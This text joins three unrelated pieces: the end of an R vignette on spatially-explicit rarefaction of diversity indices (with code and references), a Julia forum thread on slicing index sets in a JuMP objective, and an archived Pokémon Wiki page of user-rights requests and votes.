Then, using the directionalSAC function, the spatially-explicit rarefaction curve can be directly compared with the classic rarefaction:

```r
ser_rarefaction <- directionalSAC(duneFVG$total, dist_sp)
plot(1:128, ser_rarefaction$N_Exact, xlab="M", ylab="Species richness", ylim=c(0,71), pch=1)
points(1:128, ser_rarefaction$N_SCR, pch=2)
legend("bottomright", legend=c("Classic Rarefaction", "Spatially-explicit Rarefaction"), pch=1:2)
```
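directionalSAC hides the mechanics of the spatially-constrained ordering. As a language-agnostic illustration (a sketch only, not the Rarefy implementation), the idea behind the spatially-explicit curve of Chiarucci et al. (2009) is to accumulate plots in nearest-neighbour order from every possible starting plot and average the resulting curves:

```python
# Sketch of a spatially-constrained species accumulation curve
# (illustrative Python, not the Rarefy package code).
import numpy as np

def spatially_constrained_curve(comm, xy):
    """comm: plots x species presence/absence matrix; xy: plot coordinates."""
    n = comm.shape[0]
    d = np.linalg.norm(xy[:, None, :] - xy[None, :, :], axis=-1)
    curves = np.zeros((n, n))
    for start in range(n):
        order = np.argsort(d[start])            # start plot first, then by distance
        pooled = np.zeros(comm.shape[1], bool)
        for k, plot in enumerate(order):
            pooled |= comm[plot].astype(bool)   # species pooled over first k+1 plots
            curves[start, k] = pooled.sum()
    return curves.mean(axis=0)                  # average over starting plots

rng = np.random.default_rng(1)
print(spatially_constrained_curve(rng.integers(0, 2, (20, 40)), rng.random((20, 2))))
```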
## 3. Rarefaction of alpha diversity indices

In this example, the Shannon diversity index is rarefied over the M sampling units available for the duneFVG dataset. The argument fun_div allows the user to define any index of diversity of choice, and the function rare_alpha can be used to compare the spatially and non-spatially explicit rarefaction of the selected index. In the following example, two rarefaction curves (spatially and non-spatially explicit, respectively) are directly compared, calling the function speciesdiv() of the adiv package (Pavoine 2020).

Firstly, a list containing the arguments for the function speciesdiv() is created, so that the function rare_alpha() can exploit the function speciesdiv() loading the arguments.

```r
a <- list(NA, 'Shannon')
names(a) <- c('comm', 'method')
```

Then, spatially and non-spatially explicit Shannon values are calculated as a function of the sampling effort.

```r
rare_shannon <- rare_alpha(duneFVG$total, method="fun_div", random=999, fun_div='speciesdiv', args=a, mean=TRUE)
rare_shannon_sp <- rare_alpha(duneFVG$total, dist_sp, method="fun_div", random=999, fun_div='speciesdiv', args=a, mean=TRUE, spatial=TRUE)
plot(rare_shannon[,1], ylab="Shannon index", xlab="Number of sampling units", type="l", ylim=range(rare_shannon, na.rm=TRUE))
lines(rare_shannon[,2], lty=2)
lines(rare_shannon[,3], lty=2)
lines(rare_shannon_sp[,1], col=4)
lines(rare_shannon_sp[,2], lty=2, col=4)
lines(rare_shannon_sp[,3], lty=2, col=4)
legend("bottomright", legend=c("Non spatially-explicit Rarefaction", "Spatially-explicit Rarefaction"), lty=1, col=c(1,4))
```

The above figure shows the comparison of spatially and non-spatially explicit Shannon values for a given sampling effort, along with 95% confidence intervals (dashed lines). When accounting for the spatial structure of the data, the expected diversity increases less steeply than its non spatially-explicit counterpart, resulting in lower estimates of species diversity.

## 4. Rarefaction of beta diversity

Spatially-explicit or gradient-oriented (directional) turnover curves as a function of sampling effort were first defined by Ricotta et al. (2019). The methodology to construct the directional curve relies on the standard procedure in which adjacent plots are combined step by step, using the specified distance among plots as a constraining factor. In the simplest case, given a set of N plots, for each plot the first, second, ..., k-th nearest neighbors are determined and a directional beta diversity curve is constructed using the resulting sequence of plots. This procedure is repeated for all plots, generating N directional curves from which a mean spatially-explicit beta diversity curve is calculated. The resulting curve is thus an intermediate solution between a non-directional beta diversity curve and a pure directional curve in which all plots are ordered along a single spatial or environmental gradient.

directionalSAC can be used to calculate directional, normalized directional, non-directional, and normalized non-directional beta diversity as a function of sampling effort. A normalized measure of autocorrelation for directional beta diversity, calculated as the normalized difference between directional and non-directional beta, is also available.

An example of the directional rarefaction of beta diversity is provided here using the mite dataset available in the vegan package (Oksanen et al. 2020). The same example is discussed in Appendix 1 of Ricotta et al. (2019).
```r
data(mite)
data(mite.env)
comm_matrix <- mite
```

To calculate and compare directional and non-directional beta diversity along the environmental gradient defined according to the substrate density (g/L), the directionalSAC function can be used as follows:

```r
beta_directional <- directionalSAC(comm_matrix, mite.env$SubsDens)
```

Finally, directional and non-directional beta curves can be visually compared.

```r
plot(1:70, beta_directional$Beta_M, xlab="M", ylab="Beta diversity", ylim=range(c(beta_directional$Beta_M_dir, beta_directional$Beta_M)))
points(1:70, beta_directional$Beta_M_dir, pch=2)
legend("bottomright", legend=c("Non-directional beta", "Directional beta"), pch=1:2)
```

## 5. Spatially-explicit phylogenetic rarefaction curve

Rarefy presents for the first time the possibility to calculate spatially-explicit or gradient-based functional and phylogenetic rarefaction curves. We provide hereafter an example based on data available in the package (for functional rarefaction) and data available in other packages (phylogenetic rarefaction).

Here, we present an example of a spatially-explicit phylogenetic rarefaction curve. The function rare_phylo() for the calculation of phylogenetic rarefaction curves has been used to calculate the Faith index. Data from the package phyloregion (Daru et al. 2020) have been used.

First, the africa data are loaded from the package phyloregion: this list contains a sparse community composition matrix of woody plant species presences/absences within 50 × 50 km grid cells in South Africa, an object of class SpatialPolygonsDataFrame containing the grid cells covering the geographic extent of the study area, an object of class phylo describing the phylogeny of 1400 species, an object of class dist that is a distance matrix of phylogenetic beta diversity between all grid cells at the 50 × 50 km scale, and a data.frame of the IUCN conservation status of each woody species.

```r
data(africa)
```

A distance matrix between plots is extracted from the object polys of class SpatialPolygonsDataFrame.

```r
# Data are in WGS84; the reference system is changed to a projected one (LAEA)
Poli_LAEA <- spTransform(africa$polys, CRSobj='+proj=laea +lat_0=52 +lon_0=10 +x_0=4321000 +y_0=3210000 +ellps=GRS80 +units=m +no_defs')
# Warning in showSRID(uprojargs, ...): Discarded datum Unknown based on GRS80 ellipsoid in Proj4 definition
# Warning in spTransform(xSP, CRSobj, ...): NULL source CRS comment, falling back to PROJ string
# Warning in wkt(obj): CRS object has no comment

# Fix rownames in order to make them comparable to Poli_LAEA
rownames(africa$comm) <- sapply(rownames(africa$comm), function(x){gsub(pattern="v", replacement="", x)})
dista <- dist(coordinates(Poli_LAEA[1:50,]))
```

Then, the phylogenetic spatially and non-spatially explicit rarefaction curves using the Faith index are calculated for a subset of the dataset.

```r
raref <- ser_phylo(as.matrix(africa$comm[1:50, colSums(africa$comm)>0]), africa$phylo, dista, comparison=TRUE)
plot(raref[,1], ylab="Faith Index", xlab="Number of sampling units", type="l", ylim=range(raref, na.rm=TRUE))
lines(raref[,2], lty=2)
lines(raref[,3], lty=2)
lines(raref[,4], col=2)
lines(raref[,5], lty=2, col=2)
lines(raref[,6], lty=2, col=2)
legend("bottomright", legend=c("spatially-explicit phylogenetic rarefaction", "classic phylogenetic rarefaction"), lty=1, col=1:2)
```

In the figure, the phylogenetic rarefaction curves calculated using the Faith index are compared.
## 6. Null models in rarefaction practice

When communities are characterized by large differences in species richness, it may be necessary to standardize rarefaction curves by accounting for this aspect. Null models based on re-sampling of the community can help to accomplish this task. In the following example, discussed in Tordoni et al. (2019), we compare functional rarefaction curves between native and alien species (62 and 9 species, respectively) sampled in the duneFVG study. In order to exclude that the expected lower functional diversity of alien species was merely driven by the imbalance in species number between alien and native species, we built the rao_permuted function to estimate the expected functional rarefaction curve by means of species re-sampling and null model simulations.

In brief, the function works in three stages (a schematic sketch is given below):

1. From the total set of S species (62 native species in the example) sampled in M sampling units (128 plots in duneFVG), a defined number of s species (with s<S; 9 species in the example, corresponding to the alien species richness) is randomly selected; the number s is derived from a reference community (the alien species in our example) passed to the function via the comm_str argument.
2. A functional dissimilarity matrix for the set of the s randomly selected species is calculated using their associated functional traits, and then the rarefied Rao Q index is calculated for the set of M sampling units considering the abundances of a reference plant community (the structure of the reference community passed to the function via the comm_str argument).
3. For each permutation, steps 1 and 2 are repeated, and the functional rarefaction curves are then averaged over the N permutations.

The functional rarefaction curve thus obtained (which we can identify, in the example, as the average functional rarefaction curve of a community of 9 native species with the same structure as the reference alien community) can be compared to the functional rarefaction curve calculated for the community of reference, and the deviation between the two curves (when positive or negative) can be evaluated as an effect of environmental filtering, niche differentiation or biotic homogenization.
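To make the resampling logic concrete before turning to the R code, here is a schematic sketch of the three stages for a single level of sampling effort. It is an illustration only, not the rao_permuted implementation; the function name and toy data are invented:

```python
# Schematic null model behind rao_permuted: resample s species from the
# native pool, keep the reference (alien) abundance structure, average Rao Q.
import numpy as np

rng = np.random.default_rng(0)

def rao_q(p, d):
    """Rao's quadratic entropy: sum_{k,l} p_k p_l d_kl."""
    return p @ d @ p

def permuted_rao(abund_ref, dist_pool, n_perm=999):
    s = len(abund_ref)                    # richness of the reference community
    p = abund_ref / abund_ref.sum()       # its relative-abundance structure
    vals = []
    for _ in range(n_perm):
        idx = rng.choice(dist_pool.shape[0], size=s, replace=False)  # stage 1
        d = dist_pool[np.ix_(idx, idx)]                              # stage 2
        vals.append(rao_q(p, d))                                     # stage 2 (Rao Q)
    return np.mean(vals)                                             # stage 3

# toy data: a 62-species "native" distance pool, a 9-species reference community
D = rng.random((62, 62)); D = (D + D.T) / 2; np.fill_diagonal(D, 0)
print(permuted_rao(rng.integers(1, 20, 9).astype(float), D))
```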
In terms of code, the example can be run as follows. First, data for alien and native species are loaded and a functional pairwise distance matrix between native species is built using the Gower dissimilarity proposed by Pavoine et al. (2009):

```r
data(duneFVG.tr8) # species functional traits
tr8_N <- duneFVG.tr8$traits.nat[, c(1,3,4)]
tr8_D <- data.frame(duneFVG.tr8$traits.nat[, 2])
tr8_Q <- duneFVG.tr8$traits.nat[, 5:15]
tr8dist <- dist.ktab(ktab.list.df(list(tr8_N, tr8_D, tr8_Q)), type=c('N','D','Q'))
```

The standardized functional rarefaction curve is then calculated using the pairwise functional distances of native species and the alien assemblage as reference community.

```r
rareperm <- rao_permuted(duneFVG$alien, tr8dist)
```

The functional rarefaction curves for the native and alien species are then calculated, to be compared with the standardized functional rarefaction:

```r
tr8n_N <- duneFVG.tr8$traits.nat[, c(1,3,4)]
tr8n_D <- data.frame(duneFVG.tr8$traits.nat[, 2])
tr8n_Q <- duneFVG.tr8$traits.nat[, 5:15]
tr8a_N <- duneFVG.tr8$traits.ali[, c(1,3,4)]
tr8a_D <- data.frame(duneFVG.tr8$traits.ali[, 2])
tr8a_Q <- duneFVG.tr8$traits.ali[, 5:15]
tr8ndist <- dist.ktab(ktab.list.df(list(tr8n_N, tr8n_D, tr8n_Q)), type=c('N','D','Q'))
tr8adist <- dist.ktab(ktab.list.df(list(tr8a_N, tr8a_D, tr8a_Q)), type=c('N','D','Q'))
raren <- rare_Rao(duneFVG$native, tr8ndist)
rarea <- rare_Rao(duneFVG$alien, tr8adist)
```

And visually assessed to determine the degree of divergence:

```r
plot(raren[,1], ylab="Rao QE", xlab="Number of sampling units", type="l", ylim=range(raren))
lines(raren[,2], lty=2)
lines(raren[,3], lty=2)
lines(rareperm[,1], col=2)
lines(rareperm[,2], lty=2, col=2)
lines(rareperm[,3], lty=2, col=2)
lines(rarea[,1], col=4)
lines(rarea[,2], lty=2, col=4)
lines(rarea[,3], lty=2, col=4)
legend("bottomright", legend=c("Native species Functional Rarefaction", "Standardized Functional Rarefaction", "Alien species Functional Rarefaction"), lty=1, col=c(1,2,4))
```

## Cited Literature

Barker, G.M. (2002) Phylogenetic diversity: a quantitative framework for measurement of priority and achievement in biodiversity conservation. Biological Journal of the Linnean Society 76, 165-194.

Bray, J.R. & Curtis, J.T. (1957) An ordination of the upland forest communities of southern Wisconsin. Ecological Monographs 27, 325-349.

Chao, A., Chiu, C.-H., Villéger, S., Sun, I-F., Thorn, S., Lin, Y.-C., Chiang, J.-M. & Sherwin, W.B. (2019) An attribute-diversity approach to functional diversity, functional beta diversity, and related (dis)similarity measures. Ecological Monographs 89(2), e01343.

Chiarucci, A., Bacaro, G., Rocchini, D., Ricotta, C., Palmer, M. & Scheiner, S. (2009) Spatially constrained rarefaction: incorporating the autocorrelated structure of biological communities into sample-based rarefaction. Community Ecology 10(2), 209-214.

Cody, M.L. (1975) Towards a theory of continental species diversities: bird distributions over Mediterranean habitat gradients. In: Cody, M.L. & Diamond, J.M. (eds) Ecology and Evolution of Communities (pp. 214-257). Harvard: Belknap Press.

Daróczy, Z. (1970) Generalized information functions. Information and Control 16, 36-51.

Daru, B.H., Karunarathne, P. & Schliep, K. (2020) phyloregion: R package for biogeographic regionalization and macroecology. Methods in Ecology and Evolution 11, 1483-1491.

Faith, D.P. (1992) Conservation evaluation and phylogenetic diversity. Biological Conservation 61, 1-10.

Havrda, J. & Charvát, F. (1967) Quantification method of classification processes. Concept of structural entropy. Kybernetika 3, 30-35.

Hill, M.O. (1973) Diversity and evenness: a unifying notation and its consequences. Ecology 54, 427-432.

Jaccard, P. (1901) Étude comparative de la distribution florale dans une portion des Alpes et des Jura. Bulletin de la Société vaudoise des sciences naturelles 37, 547-579.

Jaccard, P. (1912) The distribution of the flora in the alpine zone. New Phytologist 11(2), 37-50.

Oksanen, J., Guillaume Blanchet, F., Friendly, M., Kindt, R., Legendre, P., McGlinn, D., ... Wagner, H. (2020) vegan: Community Ecology Package. R package version 2.5-3.
Pavoine, S., Vallet, J., Dufour, A.B., Gachet, S. & Daniel, H. (2009) On the challenge of treating various types of variables: application for improving the measurement of functional diversity. Oikos 118(3), 391-402.

Pavoine, S. & Ricotta, C. (2019) A simple translation from indices of species diversity to indices of phylogenetic diversity. Ecological Indicators 101, 552-561.

Pavoine, S. (2020) adiv: an R package to analyse biodiversity in ecology. Methods in Ecology and Evolution 11, 1106-1112.

Rao, C.R. (1982) Diversity and dissimilarity coefficients: a unified approach. Theoretical Population Biology 21, 24-43.

Ricotta, C., Acosta, T.R.A., Bacaro, G., Carboni, M., Chiarucci, A., Rocchini, D. & Pavoine, S. (2019) Rarefaction of beta diversity. Ecological Indicators 107, 105606.

Tordoni, E., Petruzzellis, F., Nardini, A., Savi, T. & Bacaro, G. (2019) Make it simpler: alien species decrease functional diversity of coastal plant communities. Journal of Vegetation Science 30, 498-509.

Tsallis, C. (1988) Possible generalization of Boltzmann-Gibbs statistics. Journal of Statistical Physics 52, 479-487.

Whittaker, R.H. (1960) Vegetation of the Siskiyou Mountains, Oregon and California. Ecological Monographs 30, 279-338.

Whittaker, R.H. (1972) Evolution and measurement of species diversity. Taxon 21, 213-251.
https://discourse.julialang.org/t/objective-function-declaration-issue/45028
# Objective function declaration issue

If I have a member of an objective function:

```julia
sum((setup_cost[f,p,j]*PR[f,p,j,t] + oper_cost[p,j]*PRD[o,f,p,j,t]) for o in O, f in FAM, p in PROD[f], j in U, t in TIME)
```

and I want to limit the counters o, f and p to 1...end-1 (in arrays), how can I do this? Thanks! marco

It's easier to help if you provide a minimal working example. Take a read of the first post in PSA: make it easier to help you. Presumably, you want something like

```julia
@objective(
    model,
    Min,
    sum(
        setup_cost[f, p, j] * PR[f, p, j, t] +
        oper_cost[p, j] * PRD[o, f, p, j, t]
        for o in O[1:end-1] for f in FAM[1:end-1] for p in PROD[f][1:end-1]
        for j in U for t in TIME
    )
)
```

Thanks odow, so "end" is also a valid operator, not only length(array)?

> so "end" is also a valid operator

Yes. Here is the documentation for Julia arrays: https://docs.julialang.org/en/v1/manual/arrays/#man-array-indexing-1

Thanks odow.
http://pokemon.wikia.com/wiki/Pok%C3%A9mon_Wiki:Requests_for_User_Rights/Archive_6?diff=cur&oldid=402257
# Pokémon Wiki:Requests for User Rights/Archive 6

This request for user rights was declined. — After a month of using rollback tools, I have to say a lot of vandalism has been reverted. I am writing this request because it is out of my power to delete some nonsense pages. I fear that the vandals that are here plan more and more things. I am asking the community to give me those tools for dealing with vandals and to do some other things, like renaming this.

Support:

#### Neutral

Neutral: I have a few reasons as to why I'm voting neutral on your request. You do a great job in tagging unneeded pages for deletion, but when you tag pages for deletion you don't normally give a reason as to why they should be deleted. Yes, the reason a page normally needs to be deleted is because 9 out of 10 times it is obvious spam or vandalism. *It's common practice to remove the content of the page when marking a page for deletion; it doesn't need to be done, but it's recommended, since the content can be vulgar and/or explicit content that nobody really needs to read. It's in italics because it's not something that is influencing my vote, just a recommendation for the future.* I don't really see much interaction between you and the community; granted, there isn't much opportunity to do so, since there aren't many people consistently editing, and I personally am trying to turn things around on the wiki, but I have school and am incredibly lazy. So those opportunities that I have in mind for community interactions aren't in existence yet. I really don't want to get on your case about the messages you do send, because on your userpage you have the "User en-3" userbox, which, in most cases, means that English is not your native language. Your warning-like messages, as seen here, aren't that descriptive and in some cases could be worded better. Edit summaries such as this one here can be viewed as "feeding the trolls"; my personal view on removing spam-like edits from pages is to just not leave an edit summary. Revert and ignore is my motto. The following talk page messages: 1, 2, 3, and 4, as well as 5, 6, 7, and 8, can all be viewed as spam-like. I understand that you want to bring more users to edit here, and in the case of your request you want it to be noticed and voted upon, but messaging multiple people for those cases is viewed as spam-like and shouldn't really be done. I really do not like voting neutral on requests, since neutrals are useless and I feel you might as well not vote if voting neutral, but I do not want to oppose, because I do have hope in you becoming an administrator in the future, and I'm not ready to support you just yet. DangerousDangerously 20:04, May 11, 2013 (UTC)

#### Oppose

Oppose:

Comment: I see. The messages on talk pages are just to give some encouragement, and it'd be better to have the users back editing, well, at least those that are still active on Wikia. Sadly, none of them have returned. About the other things, I promise I'll improve. Maybe not today or tomorrow, but after some time. Energy X 20:34, May 11, 2013 (UTC)

### KidProdigy (rollback demotion)

This request for user rights was approved. — Hello everyone, I would like to step down as a rollback around the Pokémon Wiki. I'm actually tired of helping out this wiki so much. A lot of pages are stubs, information is incomplete (some were my fault, sorry), images are incorrect, and so on. Sorry, but also, lately I wasn't even active anymore because of something I was doing.
Hopefully it will be revealed some time in the future over the net. It was fine working with all of you, thank you. KidProdigy (Local Userpage | Local Talk) 15:33, June 26, 2013 (UTC)

Support:

Neutral:

#### Oppose

Oppose:

Comment: Sorry to hear that. If it is some work that you had to do, it should take some time, no? But the arguments you gave, the stubs/incomplete articles, should actually encourage you to change them. Besides, there is other work that can be done, e.g. image categorization, grammar cleanup... But if the work you mentioned keeps you inactive, I understand. - - 17:21, June 26, 2013 (UTC)

Comment: I'm going to tell you straightforwardly that requesting demotion is one thing that's risky. People will want you to stay, so they'll oppose the request. In most cases it's for requesting the demotion of someone else, not of the person with the rights. If you want to go, it's your choice; I'm not going to hold you back, as we all have things that take priority. If you truly want to, think it over for a week and then message me and, if you still want to retire, I'll remove your rights. – Jazzi (talk) 17:52, June 26, 2013 (UTC)

Comment: Sigh, Energy X, I have no encouragement to change the pages or to do other work as well; this wiki only makes me somber. And Jazzi, I do not need a week to think about it, just remove it, thanks. KidProdigy (Local Userpage | Local Talk) 22:34, June 26, 2013 (UTC)

Comment: Your wish is my command. – Jazzi (talk) 15:00, June 27, 2013 (UTC)

### Energy X (administrator)

This request for user rights was declined. — I don't normally nominate people, because I feel that they should nominate themselves if they want to receive the rights they are requesting. Energy X has shown great commitment to this wiki and helps out in every way he can. He tags many pages for deletion; I can't link the pages that he's tagged, since they're in his deleted contributions, but he is very good at what he does. You can see that the majority, if not all, of his talk page messages (which I had a link for, but it broke the template) are alerting the admins to vandals and pages that require deletion. I'm ending school soon, but I have a somewhat summer job, so I won't be around much. I can't speak for Slaying and Rainbow Shifter, but it's always good to have admins in different timezones. Basically, the work that Energy X does is deserving of administrator rights. Jazzi (talk) 21:36, June 11, 2013 (UTC)

#### Support

Support: Per nomination – Jazzi (talk) 21:36, June 11, 2013 (UTC)

Support: I need somebody else! I need to check every page I see in Wiki Activity as well as delete 14+ candidates for deletion every time I log on. And I really cannot think of somebody more active than Energy to fulfil this role. 16:55, June 15, 2013 (UTC)

Support: He does seem to do a good job; I think he deserves admin rights for this wiki. -- King Marth 64 (talk | other wikis | blogs) 19:39, June 15, 2013 (UTC)

Support: I agree. We need all the help we can get. Signed, Winxfan1. I am the ultimate fan of Winx Club 23:11, June 15, 2013 (UTC)

Neutral:

#### Oppose

Oppose: I fear that you won't be able to determine proper block lengths. On my talk page you suggest people get "long blocks" when they don't deserve a long block, as they have not many offenses. I know I nominated you, but I have to go with my gut feeling. – Jazzi (talk) 15:07, June 27, 2013 (UTC)

Comment: Give me a few days and you'll get the rights.
– Jazzi (talk) 17:52, June 26, 2013 (UTC)

Comment: About the blocks: some of the anonymous users that vandalised pages have done it in a recognizable way, so you can compare them with some of their older accounts. Besides, with the "wiki lock" that will prevent anonymous users from editing, I can block logged-in users using the pattern I follow on other wikis: first three days, then the block rises to a week, then two weeks, then a month, etc., depending on whether the user violated the rules. - - 17:08, June 27, 2013 (UTC)

### King Marth 64 (rollback)

This request for user rights was declined. — I would like to become one of the rollback users for the Pokémon Wiki. I started out as DigiPen92 (my previous user name) three years ago, as a minor editor on the Black and White section, and then came back as a full-time editor who knows how to revert edits and how to place the deletion templates on pages that are vandalism, spam or otherwise unneeded. I have created about 10 pages on the wiki, and I know and do more on the game sections than the anime, since I have played the main game series a lot (I haven't seen much of the anime). I have about 400 main-space edits on this wiki right now, so I will help by reverting a lot of vandalism and supporting the wiki. -- King Marth 64 (talkother wikisblogs) 00:33, June 25, 2013 (UTC)

#### Support

Support: Agreed. He has displayed a lot of work in so little time, and most of it is reverting what vandals messed up. - - 09:31, June 25, 2013 (UTC)

Support: Fourteen obvious vandalism reverts in the past fourteen days. I think that you now have more experience at reverting than before, so I am changing to support. 18:02, July 4, 2013 (UTC)

#### Neutral

Neutral: Give me some time to think it over. – Jazzi (talk) 17:52, June 26, 2013 (UTC)

Neutral: I would like to see more edits before this is put into place. 18:32, June 26, 2013 (UTC)

Neutral: I want to see your regularity, efficient edits and behaviour a little more. 13:27, July 9, 2013 (UTC)

#### Oppose

Oppose:

Comment: He is a regular editor as of late... Which contributions are you looking at? 13:39, July 9, 2013 (UTC)

Comment: You cannot vote due to having only 68 mainspace contributions. – Jazzi (talk) 17:03, July 9, 2013 (UTC)

### Energy X (administrator)

This request for user rights was approved. — After some time I have learned a lot from this wiki: dealing with vandals, removing bad trivia and advising other members how they can improve their editing. If you are not familiar with my work: since December 3, 2012, I have added about 380 episode plots (the first episode was this one) and added a lot of images (I wish I knew exactly how many), and I still continue to do so, along with tagging unused images for deletion and coming up with ideas to get more viewers. Having done all this, I know people trust me to do the right thing. Trust is what I have given to some of the users here, and now I ask people to trust me enough to promote me to an admin, so I can expand my work and help our administrators with what needs to be done.

Neutral:

Oppose:

Comment:

### King Marth 64 (rollback)

This request for user rights was declined. — Reason below

As Energy X has left the rollback group and has now been added to the admin group, I think that it is time to add another user to the RB position. Right now, I see that Marth has applied for RB at least once, and I do believe that upon getting RB his edits and skill in editing will improve, as well as his ability to decide what spam is.

#### Support

Support: I support this, as I nominated Marth.
Support: We can trust Marth with the rights, and his edits as of late have been very good and productive. RainbowShifter 18:36, October 26, 2013 (UTC)

Support: I agree. People like him are a welcome addition to the patroller team. 19:02, November 3, 2013 (UTC)

Neutral:

#### Oppose

Oppose: I was going to vote neutral, but voting neutral doesn't really provide anything, so I'm opposing: users are promoted to rollback when their knowledge of what spam is is solid. His ability should not "increase", it should improve. Great user, yes, and I don't doubt his skill. I haven't been around much as of late to truly know the extent of his knowledge, but I'll be checking through his contributions. Another thing that is preventing me from supporting is the nomination statement, and what I mean by that is the part about his ability to recognize spam. However, I am basing this on things from before I left, so I will be going through his contributions to see how things are now. ∂εsσℓαтευтσρια (тαℓк) 20:11, October 21, 2013 (UTC)

Comment: Also an edit to remind people to vote, because currently he has two supports against the oppose, which means he cannot be promoted. So if you feel he should be promoted, speak now. ∂εsσℓαтευтσρια (тαℓк) 03:51, November 4, 2013 (UTC)

This request for user rights was approved. — Hey y'all. Hope you're doing alright. I'm requesting rollback rights because I feel I would make very good use of them, and I'm eventually going to request admin rights (food for thought). I've been on this wiki for 2 years now, and while I haven't been consistent in my editing, I assure you I will use my rights for good and for the better of this wiki. If you need credibility: I am an admin/bureaucrat on three different wikis and a Wikia Star, and I have never abused my powers, intentionally or for my own gain. You can also ask other users I have talked to on this wiki. I hope you'll consider me for the ranks! 06:08, November 25, 2013 (UTC)

#### Support

Support: I approve of this promotion. --OmegaRasengan (talk) 19:29, November 25, 2013 (UTC)

Support: Agreed. He has shown himself to be reliable (and not only because of his Wikia Star status). 12:13, December 10, 2013 (UTC)

Support: Has helped a lot with some vandalism cases. RainbowShifter 17:09, December 7, 2013 (UTC)

Support: He's pretty good at handling a bunch of other stuff. -- King Marth 64 (talkother wikisblogs) 17:13, December 10, 2013 (UTC)

Support: Has done a huge amount of work, especially in regards to simplifying the templates and formatting on individual Pokémon pages. --Shockstorm (talk) 06:10, December 16, 2013 (UTC)

#### Oppose

Comment: I will accept this in a few more days, to see if it gets any more input. RainbowShifter 18:09, December 14, 2013 (UTC)

### Adrián Perry GZ (user)

This request for user rights was declined. — I want to be a patroller for the following reasons. One, there are few admins on this wiki, and as far as I'm concerned, only one is constantly active. Several users around the wiki constantly create new pages that don't have anything to do with the ones we should have; most of them are personal opinions, fan-made stories, etc. The other part is speculation about upcoming Pokémon material, such as the anime. I saw when pages like "Ash's Skiddo", "Serena's Espurr", "Serena's Pancham", "Jessie's Skrelp" and the like were out there. I kind of thought "alright", but soon realized that it was speculation based on screenshots of upcoming episodes.
The episode where "Serena was going to catch a Pancham" aired, and Serena didn't catch a Pancham; Jessie caught a Pumpkaboo instead, but was there a page for "Jessie's Pumpkaboo"? No. All those pages are deleted now, and such pages should not exist until the episode where it happens has aired in Japan. Also, many users have uploaded fan-made photos and pictures of anything, such as Ash-and-Serena shipping, or "new Pokémon that are hidden within the video games", etc. Even if something like that is true, we should wait until it is officially confirmed by Game Freak. I would like to take care of all that, because a wiki is an Internet site where we can find information about what we like, in this case Pokémon, and the information this wiki has is not that good on all pages. That's why another thing I will do (whether I become a patroller or not) is reconstruct many pages, like the places in the Kalos region and moves, and many other things. So that's why I would like to become a rollback.

#### Support

Support: He gets my vote for his hard work. We could use more people like him. 23:06, January 20, 2014 (UTC)

Support: Seems to be an active, friendly, and trusted user. 09:51, December 27, 2013 (UTC)

Neutral:

#### Oppose

Oppose: I am sure you are a good editor and all, but all the reasons you stated above are not reasons for you to be a rollback. Also, in your most recent 500 edits (which I did skim through) you have not undone one edit, which is what the rollback tool is for. I was going to put this under neutral, but I can't really find any good points which match up to the negatives, other than the fact that you seem dedicated and a good editor, which is great; but without a strong history of vandalism reverting, I don't feel the rollback tool would be of much use to you. RainbowShifter 23:27, December 27, 2013 (UTC)

Oppose: I agree with Rainbow, because a rollback is a user that reverts vandalism, and in this case you haven't reverted edits that much. Instead you could apply for admin after doing more edits and being more active. Thanks. BlazeFire.

Oppose: To keep the vote from a standstill, I'm afraid that I'm going to have to say that you need to show me more effort in reverting information to its correct form.

Comment:

### DragonSpore18 (ROLLBACK)

This request for user rights was declined. — This user has shown perseverance in sticking with the wiki, and as we need RBs I think that he/she will do a great job.

Support:

Neutral:

#### Oppose

Oppose: I don't have anything against her or Kyurem147, but I do think that there are other users that could use the rollback tools more than they do. Yes, they have been very valuable (rarely missing a day or two of editing here), but they only report vandals and do not revert the vandal edits... much. 13:56, March 1, 2014 (UTC)

Oppose: Doesn't revert much vandalism. RainbowShifter 15:43, March 1, 2014 (UTC)

Oppose: I have to agree with Energy and Jade. Plasma X ~~ Talk ~~ My Contributions 13:38, March 1, 2014 (UTC)

Comment:

### Kyurem147 (ROLLBACK)

This request for user rights was declined. — This user has shown perseverance in sticking with the wiki, and as we need RBs I think that he/she will do a great job.

Support:

Neutral:

#### Oppose

Oppose: I don't have anything against her or Kyurem147, but I do think that there are other users that could use the rollback tools more than they do. Yes, they have been very valuable (rarely missing a day or two of editing here), but they only report vandals and do not revert the vandal edits... much.
13:56, March 1, 2014 (UTC)

Oppose: Doesn't revert much vandalism. RainbowShifter 15:43, March 1, 2014 (UTC)

Oppose: I have to agree with Energy and Jade. Plasma X ~~ Talk ~~ My Contributions 13:38, March 1, 2014 (UTC)

Oppose: I agree, and he has been marking pages for deletion that aren't vandalism, spam, unofficial content or anything else bad; he has been slapping the deletion template on anime pages that are completely official, without giving a clear reason why, so I don't think this is the right time for him to get the rollback rights. -- King Marth 64 (talkother wikisblogs) 20:20, March 25, 2014 (UTC)

Comment:

### King Marth 64 (rollback)

This request for user rights was approved. — I've seen many users on this wiki, and I can say King Marth 64 is one of the users that should be promoted to rollback. He rarely makes mistakes and adds quite a lot of info. This wiki needs more people like him to grow, so I vouch for him to be promoted to rollback. As you know, I was trusted with administrator tools to be an admin, so I ask that the same trust be given to King Marth 64 with the rollback tools.

#### Support

Support: As the nominator. 22:48, May 19, 2014 (UTC)

Support: Ellis99 20:57, May 22, 2014 (UTC)

Support: HobbitsLover We're blasting off againnnn! 19:16, May 25, 2014 (UTC)

Support: Well done, you deserve my vote and this position. PlasmaX~~Wanna Talk?~~My Contributions 04:23, June 7, 2014 (UTC)

Support: ––Slayingthehalcyon (talk) 20:40, June 7, 2014 (UTC)

Support: --Monfernape_If any problem? 12:15, June 16, 2014 (UTC)

#### Neutral

Neutral: I can't say yes, but I can't say no either. I think this wiki needs more rollbacks and admins, so I would kind of support King Marth 64; I would if I had seen what he has done. I honestly haven't seen what he does in general here on the wiki, but if three people have already voted for him, it means he is indeed good. Though there is something I was reading on his userpage: that he is semi-active. But, again, I can't say yes or no. I just hope that if he gets the rollback tools, he uses them correctly. Adrián Perry GZ 04:26, May 30, 2014 (UTC)

#### Oppose

Oppose: --Kyurem147 (talk) 16:14, June 16, 2014 (UTC)

Comment: So, Kyurem, why do you think King Marth shouldn't have the rollback rights? 10:27, June 17, 2014 (UTC)

### Shockstorm (rollback)

This request for user rights was approved. — Shockstorm is a great user. I have seen people with quality edits who are not very active; Shockstorm, however, edits every day, whether fixing redirects or modifying templates and images. I have yet to see a bad edit from him, and I hope it stays that way.

#### Support

Support: As nominator. 14:11, July 7, 2014 (UTC)

